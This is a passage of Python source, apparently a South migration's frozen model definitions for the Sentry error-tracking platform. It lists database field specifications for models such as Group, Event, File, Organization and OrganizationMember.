'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'ident': ('django.db.models.fields.CharField', [], {
'max_length': '128'
}),
'last_synced':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'last_verified':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']"
}
)
},
'sentry.authprovider': {
'Meta': {
'object_name': 'AuthProvider'
},
'config': ('jsonfield.fields.JSONField', [], {
'default': '{}'
}),
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'default_global_access':
('django.db.models.fields.BooleanField', [], {
'default': 'True'
}),
'default_role':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '50'
}),
'default_teams': (
'django.db.models.fields.related.ManyToManyField', [], {
'to': "orm['sentry.Team']",
'symmetrical': 'False',
'blank': 'True'
}
),
'flags': ('django.db.models.fields.BigIntegerField', [], {
'default': '0'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'last_sync': ('django.db.models.fields.DateTimeField', [], {
'null': 'True'
}),
'organization': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Organization']",
'unique': 'True'
}
),
'provider': ('django.db.models.fields.CharField', [], {
'max_length': '128'
}),
'sync_time':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'null': 'True'
})
},
'sentry.broadcast': {
'Meta': {
'object_name': 'Broadcast'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'date_expires': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime(2016, 10, 17, 0, 0)',
'null': 'True',
'blank': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'is_active':
('django.db.models.fields.BooleanField', [], {
'default': 'True',
'db_index': 'True'
}),
'link': (
'django.db.models.fields.URLField', [], {
'max_length': '200',
'null': 'True',
'blank': 'True'
}
),
'message': ('django.db.models.fields.CharField', [], {
'max_length': '256'
}),
'title': ('django.db.models.fields.CharField', [], {
'max_length': '32'
}),
'upstream_id': (
'django.db.models.fields.CharField', [], {
'max_length': '32',
'null': 'True',
'blank': 'True'
}
)
},
'sentry.broadcastseen': {
'Meta': {
'unique_together': "(('broadcast', 'user'),)",
'object_name': 'BroadcastSeen'
},
'broadcast': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Broadcast']"
}
),
'date_seen':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']"
}
)
},
'sentry.commit': {
'Meta': {
'unique_together': "(('repository_id', 'key'),)",
'object_name': 'Commit',
'index_together': "(('repository_id', 'date_added'),)"
},
'author': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.CommitAuthor']",
'null': 'True'
}
),
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key': ('django.db.models.fields.CharField', [], {
'max_length': '64'
}),
'message': ('django.db.models.fields.TextField', [], {
'null': 'True'
}),
'organization_id': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'db_index': 'True'
}
),
'repository_id':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {})
},
'sentry.commitauthor': {
'Meta': {
'unique_together': "(('organization_id', 'email'),)",
'object_name': 'CommitAuthor'
},
'email': ('django.db.models.fields.EmailField', [], {
'max_length': '75'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'name':
('django.db.models.fields.CharField', [], {
'max_length': '128',
'null': 'True'
}),
'organization_id': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'db_index': 'True'
}
)
},
'sentry.counter': {
'Meta': {
'object_name': 'Counter',
'db_table': "'sentry_projectcounter'"
},
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']",
'unique': 'True'
}
),
'value': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.dsymbundle': {
'Meta': {
'object_name': 'DSymBundle'
},
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'object': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.DSymObject']"
}
),
'sdk': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.DSymSDK']"
}
)
},
'sentry.dsymobject': {
'Meta': {
'object_name': 'DSymObject'
},
'cpu_name': ('django.db.models.fields.CharField', [], {
'max_length': '40'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'object_path': ('django.db.models.fields.TextField', [], {
'db_index': 'True'
}),
'uuid':
('django.db.models.fields.CharField', [], {
'max_length': '36',
'db_index': 'True'
}),
'vmaddr':
('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'null': 'True'
}),
'vmsize':
('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'null': 'True'
})
},
'sentry.dsymsdk': {
'Meta': {
'object_name':
'DSymSDK',
'index_together':
"[('version_major', 'version_minor', 'version_patchlevel', 'version_build')]"
},
'dsym_type':
('django.db.models.fields.CharField', [], {
'max_length': '20',
'db_index': 'True'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'sdk_name': ('django.db.models.fields.CharField', [], {
'max_length': '20'
}),
'version_build': ('django.db.models.fields.CharField', [], {
'max_length': '40'
}),
'version_major': ('django.db.models.fields.IntegerField', [], {}),
'version_minor': ('django.db.models.fields.IntegerField', [], {}),
'version_patchlevel': ('django.db.models.fields.IntegerField', [], {})
},
'sentry.dsymsymbol': {
'Meta': {
'unique_together': "[('object', 'address')]",
'object_name': 'DSymSymbol'
},
'address':
('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'db_index': 'True'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'object': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.DSymObject']"
}
),
'symbol': ('django.db.models.fields.TextField', [], {})
},
'sentry.environment': {
'Meta': {
'unique_together': "(('project_id', 'name'),)",
'object_name': 'Environment'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'name': ('django.db.models.fields.CharField', [], {
'max_length': '64'
}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {})
},
'sentry.event': {
'Meta': {
'unique_together': "(('project_id', 'event_id'),)",
'object_name': 'Event',
'db_table': "'sentry_message'",
'index_together': "(('group_id', 'datetime'),)"
},
'data':
('sentry.db.models.fields.node.NodeField', [], {
'null': 'True',
'blank': 'True'
}),
'datetime': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'db_index': 'True'
}
),
'event_id': (
'django.db.models.fields.CharField', [], {
'max_length': '32',
'null': 'True',
'db_column': "'message_id'"
}
),
'group_id': (
'sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'null': 'True',
'blank': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'message': ('django.db.models.fields.TextField', [], {}),
'platform':
('django.db.models.fields.CharField', [], {
'max_length': '64',
'null': 'True'
}),
'project_id': (
'sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'null': 'True',
'blank': 'True'
}
),
'time_spent':
('sentry.db.models.fields.bounded.BoundedIntegerField', [], {
'null': 'True'
})
},
'sentry.eventmapping': {
'Meta': {
'unique_together': "(('project_id', 'event_id'),)",
'object_name': 'EventMapping'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'event_id': ('django.db.models.fields.CharField', [], {
'max_length': '32'
}),
'group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.eventtag': {
'Meta': {
'unique_together':
"(('event_id', 'key_id', 'value_id'),)",
'object_name':
'EventTag',
'index_together':
"(('project_id', 'key_id', 'value_id'), ('group_id', 'key_id', 'value_id'))"
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'event_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'group_id':
('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'null': 'True'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'value_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.eventuser': {
'Meta': {
'unique_together':
"(('project', 'ident'), ('project', 'hash'))",
'object_name':
'EventUser',
'index_together':
"(('project', 'email'), ('project', 'username'), ('project', 'ip_address'))"
},
'date_added': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'db_index': 'True'
}
),
'email':
('django.db.models.fields.EmailField', [], {
'max_length': '75',
'null': 'True'
}),
'hash': ('django.db.models.fields.CharField', [], {
'max_length': '32'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'ident':
('django.db.models.fields.CharField', [], {
'max_length': '128',
'null': 'True'
}),
'ip_address': (
'django.db.models.fields.GenericIPAddressField', [], {
'max_length': '39',
'null': 'True'
}
),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'username':
('django.db.models.fields.CharField', [], {
'max_length': '128',
'null': 'True'
})
},
'sentry.file': {
'Meta': {
'object_name': 'File'
},
'blob': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'legacy_blob'",
'null': 'True',
'to': "orm['sentry.FileBlob']"
}
),
'blobs': (
'django.db.models.fields.related.ManyToManyField', [], {
'to': "orm['sentry.FileBlob']",
'through': "orm['sentry.FileBlobIndex']",
'symmetrical': 'False'
}
),
'checksum':
('django.db.models.fields.CharField', [], {
'max_length': '40',
'null': 'True'
}),
'headers': ('jsonfield.fields.JSONField', [], {
'default': '{}'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'name': ('django.db.models.fields.CharField', [], {
'max_length': '128'
}),
'path': ('django.db.models.fields.TextField', [], {
'null': 'True'
}),
'size':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'null': 'True'
}),
'timestamp': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'db_index': 'True'
}
),
'type': ('django.db.models.fields.CharField', [], {
'max_length': '64'
})
},
'sentry.fileblob': {
'Meta': {
'object_name': 'FileBlob'
},
'checksum':
('django.db.models.fields.CharField', [], {
'unique': 'True',
'max_length': '40'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'path': ('django.db.models.fields.TextField', [], {
'null': 'True'
}),
'size':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'null': 'True'
}),
'timestamp': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'db_index': 'True'
}
)
},
'sentry.fileblobindex': {
'Meta': {
'unique_together': "(('file', 'blob', 'offset'),)",
'object_name': 'FileBlobIndex'
},
'blob': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.FileBlob']"
}
),
'file': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.File']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'offset': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {})
},
'sentry.globaldsymfile': {
'Meta': {
'object_name': 'GlobalDSymFile'
},
'cpu_name': ('django.db.models.fields.CharField', [], {
'max_length': '40'
}),
'file': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.File']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'object_name': ('django.db.models.fields.TextField', [], {}),
'uuid':
('django.db.models.fields.CharField', [], {
'unique': 'True',
'max_length': '36'
})
},
'sentry.group': {
'Meta': {
'unique_together': "(('project', 'short_id'),)",
'object_name': 'Group',
'db_table': "'sentry_groupedmessage'",
'index_together': "(('project', 'first_release'),)"
},
'active_at':
('django.db.models.fields.DateTimeField', [], {
'null': 'True',
'db_index': 'True'
}),
'culprit': (
'django.db.models.fields.CharField', [], {
'max_length': '200',
'null': 'True',
'db_column': "'view'",
'blank': 'True'
}
),
'data': (
'sentry.db.models.fields.gzippeddict.GzippedDictField', [], {
'null': 'True',
'blank': 'True'
}
),
'first_release': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Release']",
'null': 'True',
'on_delete': 'models.PROTECT'
}
),
'first_seen': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'db_index': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'is_public': (
'django.db.models.fields.NullBooleanField', [], {
'default': 'False',
'null': 'True',
'blank': 'True'
}
),
'last_seen': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'db_index': 'True'
}
),
'level': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '40',
'db_index': 'True',
'blank': 'True'
}
),
'logger': (
'django.db.models.fields.CharField', [], {
'default': "''",
'max_length': '64',
'db_index': 'True',
'blank': 'True'
}
),
'message': ('django.db.models.fields.TextField', [], {}),
'num_comments': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0',
'null': 'True'
}
),
'platform':
('django.db.models.fields.CharField', [], {
'max_length': '64',
'null': 'True'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']",
'null': 'True'
}
),
'resolved_at':
('django.db.models.fields.DateTimeField', [], {
'null': 'True',
'db_index': 'True'
}),
'score': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {
'default': '0'
}),
'short_id':
('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'null': 'True'
}),
'status': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0',
'db_index': 'True'
}
),
'time_spent_count':
('sentry.db.models.fields.bounded.BoundedIntegerField', [], {
'default': '0'
}),
'time_spent_total':
('sentry.db.models.fields.bounded.BoundedIntegerField', [], {
'default': '0'
}),
'times_seen': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '1',
'db_index': 'True'
}
)
},
'sentry.groupassignee': {
'Meta': {
'object_name': 'GroupAssignee',
'db_table': "'sentry_groupasignee'"
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'assignee_set'",
'unique': 'True',
'to': "orm['sentry.Group']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'assignee_set'",
'to': "orm['sentry.Project']"
}
),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'sentry_assignee_set'",
'to': "orm['sentry.User']"
}
)
},
'sentry.groupbookmark': {
'Meta': {
'unique_together': "(('project', 'user', 'group'),)",
'object_name': 'GroupBookmark'
},
'date_added': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'null': 'True'
}
),
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'bookmark_set'",
'to': "orm['sentry.Group']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'bookmark_set'",
'to': "orm['sentry.Project']"
}
),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'sentry_bookmark_set'",
'to': "orm['sentry.User']"
}
)
},
'sentry.groupemailthread': {
'Meta': {
'unique_together': "(('email', 'group'), ('email', 'msgid'))",
'object_name': 'GroupEmailThread'
},
'date': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'db_index': 'True'
}
),
'email': ('django.db.models.fields.EmailField', [], {
'max_length': '75'
}),
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'groupemail_set'",
'to': "orm['sentry.Group']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'msgid': ('django.db.models.fields.CharField', [], {
'max_length': '100'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'groupemail_set'",
'to': "orm['sentry.Project']"
}
)
},
'sentry.grouphash': {
'Meta': {
'unique_together': "(('project', 'hash'),)",
'object_name': 'GroupHash'
},
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Group']",
'null': 'True'
}
),
'hash': ('django.db.models.fields.CharField', [], {
'max_length': '32'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']",
'null': 'True'
}
)
},
'sentry.groupmeta': {
'Meta': {
'unique_together': "(('group', 'key'),)",
'object_name': 'GroupMeta'
},
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Group']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key': ('django.db.models.fields.CharField', [], {
'max_length': '64'
}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.groupredirect': {
'Meta': {
'object_name': 'GroupRedirect'
},
'group_id':
('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'db_index': 'True'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'previous_group_id':
('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'unique': 'True'
})
},
'sentry.grouprelease': {
'Meta': {
'unique_together': "(('group_id', 'release_id', 'environment'),)",
'object_name': 'GroupRelease'
},
'environment':
('django.db.models.fields.CharField', [], {
'default': "''",
'max_length': '64'
}),
'first_seen':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'group_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'last_seen': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'db_index': 'True'
}
),
'project_id': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'db_index': 'True'
}
),
'release_id': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'db_index': 'True'
}
)
},
'sentry.groupresolution': {
'Meta': {
'object_name': 'GroupResolution'
},
'datetime': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'db_index': 'True'
}
),
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Group']",
'unique': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'release': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Release']"
}
),
'status':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0'
})
},
'sentry.grouprulestatus': {
'Meta': {
'unique_together': "(('rule', 'group'),)",
'object_name': 'GroupRuleStatus'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Group']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'last_active': ('django.db.models.fields.DateTimeField', [], {
'null': 'True'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'rule': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Rule']"
}
),
'status': ('django.db.models.fields.PositiveSmallIntegerField', [], {
'default': '0'
})
},
'sentry.groupseen': {
'Meta': {
'unique_together': "(('user', 'group'),)",
'object_name': 'GroupSeen'
},
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Group']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'last_seen':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']",
'db_index': 'False'
}
)
},
'sentry.groupsnooze': {
'Meta': {
'object_name': 'GroupSnooze'
},
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Group']",
'unique': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'until': ('django.db.models.fields.DateTimeField', [], {})
},
'sentry.groupsubscription': {
'Meta': {
'unique_together': "(('group', 'user'),)",
'object_name': 'GroupSubscription'
},
'date_added': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'null': 'True'
}
),
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'subscription_set'",
'to': "orm['sentry.Group']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'is_active': ('django.db.models.fields.BooleanField', [], {
'default': 'True'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'subscription_set'",
'to': "orm['sentry.Project']"
}
),
'reason':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0'
}),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']"
}
)
},
'sentry.grouptagkey': {
'Meta': {
'unique_together': "(('project', 'group', 'key'),)",
'object_name': 'GroupTagKey'
},
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Group']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key': ('django.db.models.fields.CharField', [], {
'max_length': '32'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']",
'null': 'True'
}
),
'values_seen':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0'
})
},
'sentry.grouptagvalue': {
'Meta': {
'unique_together': "(('group', 'key', 'value'),)",
'object_name': 'GroupTagValue',
'db_table': "'sentry_messagefiltervalue'",
'index_together': "(('project', 'key', 'value'),)"
},
'first_seen': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'null': 'True',
'db_index': 'True'
}
),
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'grouptag'",
'to': "orm['sentry.Group']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key': ('django.db.models.fields.CharField', [], {
'max_length': '32'
}),
'last_seen': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'null': 'True',
'db_index': 'True'
}
),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'grouptag'",
'null': 'True',
'to': "orm['sentry.Project']"
}
),
'times_seen':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0'
}),
'value': ('django.db.models.fields.CharField', [], {
'max_length': '200'
})
},
'sentry.lostpasswordhash': {
'Meta': {
'object_name': 'LostPasswordHash'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'hash': ('django.db.models.fields.CharField', [], {
'max_length': '32'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']",
'unique': 'True'
}
)
},
'sentry.option': {
'Meta': {
'object_name': 'Option'
},
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key':
('django.db.models.fields.CharField', [], {
'unique': 'True',
'max_length': '64'
}),
'last_updated':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'value': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {})
},
'sentry.organization': {
'Meta': {
'object_name': 'Organization'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'default_role':
('django.db.models.fields.CharField', [], {
'default': "'member'",
'max_length': '32'
}),
'flags': ('django.db.models.fields.BigIntegerField', [], {
'default': '1'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'members': (
'django.db.models.fields.related.ManyToManyField', [], {
'related_name': "'org_memberships'",
'symmetrical': 'False',
'through': "orm['sentry.OrganizationMember']",
'to': "orm['sentry.User']"
}
),
'name': ('django.db.models.fields.CharField', [], {
'max_length': '64'
}),
'slug':
('django.db.models.fields.SlugField', [], {
'unique': 'True',
'max_length': '50'
}),
'status':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0'
})
},
'sentry.organizationaccessrequest': {
'Meta': {
'unique_together': "(('team', 'member'),)",
'object_name': 'OrganizationAccessRequest'
},
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'member': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.OrganizationMember']"
}
),
'team': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Team']"
}
)
},
'sentry.organizationmember': {
'Meta': {
'unique_together': "(('organization', 'user'), ('organization', 'email'))",
'object_name': 'OrganizationMember'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'email': (
'django.db.models.fields.EmailField', [], {
'max_length': '75',
'null': 'True',
'blank': 'True'
}
),
'flags': ('django.db.models.fields.BigIntegerField', [], {
'default': '0'
}),
'has_global_access': ('django.db.models.fields.BooleanField', [], {
'default': 'True'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'organization': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'member_set'",
'to': "orm['sentry.Organization']"
}
),
'role':
('django.db.models.fields.CharField', [], {
'default': "'member'",
'max_length': '32'
}),
'teams': (
'django.db.models.fields.related.ManyToManyField', [], {
'to': "orm['sentry.Team']",
'symmetrical': 'False',
'through': "orm['sentry.OrganizationMemberTeam']",
'blank': 'True'
}
),
'token': (
'django.db.models.fields.CharField', [], {
'max_length': '64',
'unique': 'True',
'null': 'True',
'blank': 'True'
}
),
'type': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '50',
'blank': 'True'
}
),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'blank': 'True',
'related_name': "'sentry_orgmember_set'",
'null': 'True',
'to': "orm['sentry.User']"
}
)
},
'sentry.organizationmemberteam': {
'Meta': {
'unique_together': "(('team', 'organizationmember'),)",
'object_name': 'OrganizationMemberTeam',
'db_table': "'sentry_organizationmember_teams'"
},
'id': ('sentry.db.models.fields.bounded.BoundedAutoField', [], {
'primary_key': 'True'
}),
'is_active': ('django.db.models.fields.BooleanField', [], {
'default': 'True'
}),
'organizationmember': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.OrganizationMember']"
}
),
'team': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
